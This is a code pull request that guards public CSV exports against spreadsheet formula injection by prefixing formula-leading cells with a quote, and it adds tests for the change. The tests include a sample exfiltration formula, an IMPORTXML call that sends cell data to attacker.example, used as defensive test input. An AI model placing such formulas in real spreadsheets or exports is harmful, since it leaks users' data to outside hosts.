### PR TITLE
Fix CSV formula injection in public exports

### DIFF
--- a/scripts/__tests__/csv-helpers.test.ts
+++ b/scripts/__tests__/csv-helpers.test.ts
@@ -1,0 +1,21 @@
+import { describe, expect, it } from "vitest";
+
+import { escapeCsvField } from "../lib/csv-helpers";
+
+describe("script CSV helpers", () => {
+  it("neutralizes formula-leading spreadsheet cells before CSV quoting", () => {
+    expect(escapeCsvField('=IMPORTXML("https://attacker.example/?q="&A1)')).toBe(
+      '"\'=IMPORTXML(""https://attacker.example/?q=""&A1)"',
+    );
+    expect(escapeCsvField("+malicious")).toBe("'+malicious");
+    expect(escapeCsvField("-malicious")).toBe("'-malicious");
+    expect(escapeCsvField("@malicious")).toBe("'@malicious");
+    expect(escapeCsvField("  @malicious")).toBe("'  @malicious");
+  });
+
+  it("keeps normal CSV quoting behavior", () => {
+    expect(escapeCsvField("USD Coin")).toBe("USD Coin");
+    expect(escapeCsvField('quoted, "value"')).toBe('"quoted, ""value"""');
+    expect(escapeCsvField(null)).toBe("");
+  });
+});

--- a/scripts/lib/csv-helpers.ts
+++ b/scripts/lib/csv-helpers.ts
@@ -12,8 +12,14 @@ export interface CsvColumn<T> {
   accessor: (row: T) => string | number | null;
 }
 
+const FORMULA_LEADING_CHARS = /^[\t\r ]*[=+\-@]/;
+
+function neutralizeSpreadsheetFormula(value: string): string {
+  return FORMULA_LEADING_CHARS.test(value) ? `'${value}` : value;
+}
+
 export function escapeCsvField(value: string | number | null | undefined): string {
   if (value === null || value === undefined) return "";
-  const str = String(value);
+  const str = typeof value === "string" ? neutralizeSpreadsheetFormula(value) : String(value);
   return str.includes(",") || str.includes('"') || str.includes("\n") ? `"${str.replace(/"/g, '""')}"` : str;
 }

--- a/src/lib/exports/__tests__/csv.test.ts
+++ b/src/lib/exports/__tests__/csv.test.ts
@@ -44,6 +44,30 @@ describe("buildCsvWithPreamble", () => {
     const lines = csv.split("\n");
     expect(lines[2]).toBe(",");
   });
+
+  it("neutralizes formula-leading spreadsheet cells before CSV quoting", () => {
+    const csv = buildCsvWithPreamble(
+      [
+        {
+          symbol: '=IMPORTXML("https://attacker.example/?q="&A1)',
+          mechanism: "+malicious",
+          spaced: "  @malicious",
+          ordinaryNegativeNumber: -1,
+        },
+      ],
+      [
+        { header: "Symbol", accessor: (row) => row.symbol },
+        { header: "Mechanism", accessor: (row) => row.mechanism },
+        { header: "Spaced", accessor: (row) => row.spaced },
+        { header: "OrdinaryNegativeNumber", accessor: (row) => row.ordinaryNegativeNumber },
+      ],
+      PREAMBLE,
+    );
+
+    expect(csv.split("\n")[2]).toBe(
+      '"\'=IMPORTXML(""https://attacker.example/?q=""&A1)",\'+malicious,\'  @malicious,-1',
+    );
+  });
 });
 
 describe("downloadCsvWithPreamble", () => {

--- a/src/lib/exports/csv.ts
+++ b/src/lib/exports/csv.ts
@@ -6,9 +6,15 @@ export interface CsvColumn<T> {
   accessor: (row: T, index: number) => string | number | null;
 }
 
+const FORMULA_LEADING_CHARS = /^[\t\r ]*[=+\-@]/;
+
+function neutralizeSpreadsheetFormula(value: string): string {
+  return FORMULA_LEADING_CHARS.test(value) ? `'${value}` : value;
+}
+
 export function escapeCsvField(value: string | number | null | undefined): string {
   if (value === null || value === undefined) return "";
-  const str = String(value);
+  const str = typeof value === "string" ? neutralizeSpreadsheetFormula(value) : String(value);
   return str.includes(",") || str.includes('"') || str.includes("\n")
     ? `"${str.replace(/"/g, '""')}"`
     : str;


### PR DESCRIPTION
### Motivation
- The public dataset generator and browser CSV export could emit untrusted string cells beginning with `=`, `+`, `-`, or `@`, allowing spreadsheet formula injection when users import the published CSVs.
- Pages prebuilds now run the generator in live-fetch mode, so unsafe upstream data can reach `public/datasets/*` and `public/sheets/*.csv` and must be sanitized at generation time.

### Description
- Neutralize formula-leading characters for string CSV cells by detecting leading `=`, `+`, `-`, or `@` (allowing leading spaces/tabs/CR) and prefixing such cells with a single quote before normal CSV quoting.
- Apply the neutralization in the server-side CSV helper used by generators at `scripts/lib/csv-helpers.ts` and mirror the same behavior in the browser CSV helper at `src/lib/exports/csv.ts` while preserving numeric behavior.
- Update the CSV escaping flow to call `neutralizeSpreadsheetFormula()` for string inputs and keep the existing comma/quote/newline quoting behavior intact.
- Add focused tests: new `scripts/__tests__/csv-helpers.test.ts` and an additional case in `src/lib/exports/__tests__/csv.test.ts` that assert formula-leading cells are neutralized and numeric negative values remain unchanged.

### Testing
- Ran the focused Vitest suite: `npx vitest run scripts/__tests__/csv-helpers.test.ts src/lib/exports/__tests__/csv.test.ts scripts/__tests__/generate-public-datasets.test.ts`, and all tests passed (3 test files, 15 tests total).
- Ran type checking with `npm run typecheck`, which completed successfully.

------
[Codex Task](https://chatgpt.com/codex/cloud/tasks/task_e_6a3509b17b3483328e9fee2e1c6c5718)